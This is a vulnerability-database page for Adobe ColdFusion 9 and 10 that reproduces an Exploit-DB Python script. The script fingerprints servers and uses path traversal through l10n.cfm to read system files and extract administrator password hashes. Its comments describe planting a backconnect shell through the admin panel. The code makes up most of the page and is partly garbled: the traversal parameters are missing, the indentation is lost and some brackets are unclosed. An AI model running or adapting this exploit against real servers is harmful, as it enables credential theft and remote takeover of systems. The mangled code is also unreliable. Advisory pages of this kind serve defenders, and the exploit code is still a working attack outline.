Related Weaknesses
Weakness Name |
Source |
CWE Other |
No informations. |
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
AV:N/AC:L/Au:N/C:P/I:N/A:N |
[email protected] |
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 25305
Publication date : 2013-05-07 22h00 +00:00
Author : HTP
EDB Verified : No
#!/usr/bin/env python
# -*- coding: utf-8 -*-
_ _ _______ _____ _ _ _______ Cold ,''' Fusion
|_____| | |_____] \ / |______ Cold ,''' /-- Fusion
| | | | \/ ______|. Cold -,__,' Fusion
Name : ColdSub-Zero.pyFusion v2
Description : CF9-10 Remote Root Zeroday
Crew : HTP
cyan = "\x1b[1;36m"
red = "\x1b[1;31m"
clear = "\x1b[0m"
print intro.replace("Cold",cyan).replace("Fusion",clear)
import requests, time, sys, urllib, hashlib
def flash(color,text,times):
line1 = "\x0d\x1b[2K%s%s" % (color,text)
line2 = "\x0d\x1b[2K%s%s" % (clear,text)
for x in range(0,times):
print line2
abspath = ""
operatingsystem = "refrigerator"
coldfusion = 0
def fingerprintcf(protocol,target):
# Fingerprint using md5's of CF 9/10 admin image
print "[*] Fingerprinting CF 9/10 instance"
imgdata = requests.get("%s://%s/CFIDE/administrator/images/loginbackground.jpg" % (protocol,target)).content
md5fingerprint = hashlib.md5(imgdata).hexdigest()
if md5fingerprint == "a4c81b7a6289b2fc9b36848fa0cae83c":
print "[*] Detected ColdFusion 10"
return 10
elif md5fingerprint == "596b3fc4f1a0b818979db1cf94a82220":
print "[*] Detected ColdFusion 9"
return 9
elif md5fingerprint == "779efc149954677095446c167344dbfc":
# ColdFusion 8 doesn't have mail.cfm, but it is still exploitable due to l10n parsing the template as CFM.
# It would require shell data to be on the box to include, such as an uploaded 'picture' or what-not.
print "[*] Requires inclusion: m4ke your 0wn fuq1ng z3r0d4y!"
print "[*] Unable to fingerprint, continuing with little environment data"
return None
def getpath(protocol,target):
# Leverage a path disclosure to get the absolute path on CF9-10
print "[*] Testing for path disclosure"
abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?" % (protocol,target)).headers
if "set-cookie" in abspathdata.keys():
abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
print "[*] Absolute path obtained: %s" % abspath
if abspath[0] == "/":
print "[*] Detected Linux"
operatingsystem = "linux"
elif abspath[1] == ":":
print "[*] Detected Windows"
operatingsystem = "windows 95 with bonzibuddy"
print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
operatingsystem = "refrigerator"
print "[?] OS detection failure. Continuing with fingerprint."
print "[?] OS detection failure. Continuing with fingerprint."
return abspath,operatingsystem
# HTP '13
# Congratulations, you're reading the source.
# Subzero v2 is a do-it-yourself Subzero v1. Some details have been provided throughout the source hinting at the potential usage.
# As far as changes, the Null RDS 1day has been removed, as well as the locale + FCKEditor exploitation checks & auth bypass + shell drop.
# If you know what you are doing, this 0day can be used in conjunction with the other 0days to exploit ColdFusion 6-10. (aka everything).
# ColdFusion 6 can be taken out with the locale 0day, and XORing against the stored private key will yield the actual
# login password.
# Since you're reading the source, we'll give you another 0day to improve Subzero. Once Subzero has extracted the hash, use scheduled tasks
# to store your backconnect shell in a temp directory (such as the CF temp directory/windows TEMP dir or /dev/shm). Then, use Server Settings
# > Settings in the CF admin to load it as the Missing Template Handler (you can travel upwards from the 'relative path' using ../). Finally,
# trigger a 404 to recieve your backconnect, and restore the Missing Template Handler. We might release fUZE Shell v2 in the future for POCs
# of this written in CFML.
# For anyone looking to fully weaponize Subzero into direct RXE for ColdFusion 10, we'll give you a hint. Subzero is a LFI, not a LFD.
# (preinstalled *.cfm) :P
target = raw_input("Target> ")
if "https" in target:
protocol = "https"
target = target.replace("http://","").replace("https://","").split("/")[0]
print "[*] Target set to: %s" % target
print "[*] HTTPS: Enabled"
protocol = "http"
target = target.replace("http://","").replace("https://","").split("/")[0]
print "[*] Target set to: %s" % target
abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)
print "[*] Collecting additional data about operating system"
etchosts = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?" % (protocol,target)).content
bootini = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?" % (protocol,target)).content
if "hosts" in etchosts or "" in etchosts:
operatingsystem = "linux"
elif "[boot loader]" in bootini or "[operating systems]" in bootini:
operatingsystem = "windows 95 with bonzibuddy"
elif operatingsystem is "linux" or "windows 95 with bonzibuddy":
operatingsystem = "refrigerator"
if operatingsystem is "refrigerator":
print "[*] go0d 1uq!!"
print "[*] Obtaining credentials"
tests = ["../../lib/","..\..\lib\"]
if operatingsystem is "windows 95 with bonzibuddy":
if coldfusion == 10:
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion10\lib\",
elif coldfusion == 9:
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\",
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\",
elif operatingsystem is "linux":
if coldfusion == 10:
tests += ["../../../../../../../../../opt/coldfusion10/cfusion/lib/",
elif coldfusion == 9:
tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/",
tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/",
elif operatingsystem is "refrigerator":
# w3lp l00ks l1k3 w3 g0tt4 5h0tguN th1s sh1t
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\",
for path in tests:
lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?" % (protocol,target,path)).content
if "encrypted=true" in lfidata:
credzacquired = True
print "[*] CF Administrator credentials acquired:"
print lfidata
if credzacquired == True:
flash(cyan,"[~] SUB ZERO WINS",3)
flash(red,"[!] FLAWLESS VICTORY",3)
flash(red,"[!] COLDFUSION ADMIN WINS",3)
# e0f HTP '13
Products Mentioned
Configuraton 0
Adobe>>Coldfusion >> Version 9.0
Adobe>>Coldfusion >> Version 9.0.1
Adobe>>Coldfusion >> Version 9.0.2
Adobe>>Coldfusion >> Version 10.0